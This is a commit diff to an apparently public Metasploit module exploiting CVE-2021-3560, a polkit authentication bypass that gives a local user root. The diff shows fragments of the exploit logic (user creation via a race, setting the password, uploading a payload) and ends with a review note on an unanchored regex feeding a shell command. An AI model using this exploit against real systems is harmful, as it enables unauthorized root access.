Updated docs
parent
fdbf669da2
commit
9a07039e7e
|
@ -1,6 +1,6 @@
|
||||||
## Description
|
## Description
|
||||||
|
|
||||||
This module exploits a authentication bypass in Linux machines that make use of the polkit is a system service.
|
This module exploits a authentication bypass in Linux machines that make use of the polkit system service.
|
||||||
The vulnerability enables an unprivileged local user to get a root shell on the system.
|
The vulnerability enables an unprivileged local user to get a root shell on the system.
|
||||||
|
|
||||||
## Vulnerable Application
|
## Vulnerable Application
|
||||||
|
@ -27,15 +27,15 @@ Download and install Ubuntu 20.04 from the Ubuntu Downloads page: https://ubuntu
|
||||||
**SESSION**
|
**SESSION**
|
||||||
The session to run this module on.
|
The session to run this module on.
|
||||||
|
|
||||||
**WRITABLE_DIR**
|
|
||||||
Directory to write file to (`%TEMP%` by default).
|
|
||||||
|
|
||||||
**USERNAME**
|
**USERNAME**
|
||||||
The name of the user the exploit will add to the system
|
The name of the user the exploit will add to the system
|
||||||
|
|
||||||
**PASSWORD**
|
**PASSWORD**
|
||||||
The password for the user to be created
|
The password for the user to be created
|
||||||
|
|
||||||
|
**WritableDir**
|
||||||
|
Directory to write file to (`%TEMP%` by default).
|
||||||
|
|
||||||
## Scenarios
|
## Scenarios
|
||||||
|
|
||||||
### Tested on Ubuntu 20.04
|
### Tested on Ubuntu 20.04
|
||||||
|
|
|
@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
'References' => [
|
'References' => [
|
||||||
['URL', 'https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/'],
|
['URL', 'https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/'],
|
||||||
['CVE', '2021-3560'],
|
['CVE', '2021-3560'],
|
||||||
['EDB', '50011'],
|
['EDB', '50011']
|
||||||
],
|
],
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
|
@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
register_options([
|
register_options([
|
||||||
OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
|
OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
|
||||||
OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]),
|
OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]),
|
||||||
OptString.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])
|
OptInt.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])
|
||||||
])
|
])
|
||||||
register_advanced_options([
|
register_advanced_options([
|
||||||
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
|
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
|
||||||
|
@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
if exploit_set_realname(rand_text_alphanumeric(12))
|
if exploit_set_realname(rand_text_alphanumeric(12))
|
||||||
status = CheckCode::Vulnerable('The polkit framework instance is vulnerable.')
|
status = CheckCode::Vulnerable('The polkit framework instance is vulnerable.')
|
||||||
unless exploit_set_realname(old_realname)
|
unless exploit_set_realname(old_realname)
|
||||||
print_error('Failed to restore the root user\'s orignal \'RealName\' property value')
|
print_error('Failed to restore the root user\'s original \'RealName\' property value')
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
@ -227,9 +227,9 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
cmd_args << object_path
|
cmd_args << object_path
|
||||||
cmd_args << interface_member
|
cmd_args << interface_member
|
||||||
args.each do |arg|
|
args.each do |arg|
|
||||||
if arg.is_a? Integer
|
if arg.is_a?(Integer)
|
||||||
cmd_args << "int32:#{arg}"
|
cmd_args << "int32:#{arg}"
|
||||||
elsif arg.is_a? String
|
elsif arg.is_a?(String)
|
||||||
cmd_args << "string:'#{arg}'"
|
cmd_args << "string:'#{arg}'"
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
@ -320,15 +320,15 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
|
|
||||||
def upload(path, data)
|
def upload(path, data)
|
||||||
print_status "Writing '#{path}' (#{data.size} bytes) ..."
|
print_status("Writing '#{path}' (#{data.size} bytes) ...")
|
||||||
rm_f path
|
rm_f(path)
|
||||||
write_file path, data
|
write_file(path, data)
|
||||||
register_file_for_cleanup path
|
register_file_for_cleanup(path)
|
||||||
end
|
end
|
||||||
|
|
||||||
def upload_and_chmodx(path, data)
|
def upload_and_chmodx(path, data)
|
||||||
upload path, data
|
upload(path, data)
|
||||||
chmod path
|
chmod(path)
|
||||||
end
|
end
|
||||||
|
|
||||||
def upload_payload
|
def upload_payload
|
||||||
|
@ -351,7 +351,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
if exploit_set_username(loop_sequence)
|
if exploit_set_username(loop_sequence)
|
||||||
uid = cmd_exec("id -u #{datastore['USERNAME']}")
|
uid = cmd_exec("id -u #{datastore['USERNAME']}")
|
||||||
print_good("User #{datastore['USERNAME']} created with UID #{uid}")
|
print_good("User #{datastore['USERNAME']} created with UID #{uid}")
|
||||||
print_status("Attempting to set the password of the newly create user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
|
print_status("Attempting to set the password of the newly created user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
|
||||||
if exploit_set_password(uid, create_unix_crypt_hash, loop_sequence)
|
if exploit_set_password(uid, create_unix_crypt_hash, loop_sequence)
|
||||||
print_good('Obtained code execution has root!')
|
print_good('Obtained code execution has root!')
|
||||||
fname = upload_payload
|
fname = upload_payload
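Review bot: The USERNAME option in the `register_options` hunk is validated with `^`/`$`, which in Ruby anchor at line boundaries rather than at the ends of the string, and the value is later interpolated unquoted into `cmd_exec("id -u #{datastore['USERNAME']}")` in the last hunk. If the option validator uses an ordinary regex match (not visible here), a multi-line value would pass as long as one of its lines matches; anchoring the whole string closes that: `regex: /\A[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)\z/`. Separately, this commit fixes two typos in messages but leaves `'Obtained code execution has root!'` in the last hunk, which presumably should read `as root`. The enclosing methods of both hunks start and end outside the visible lines.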
|
||||||
|
|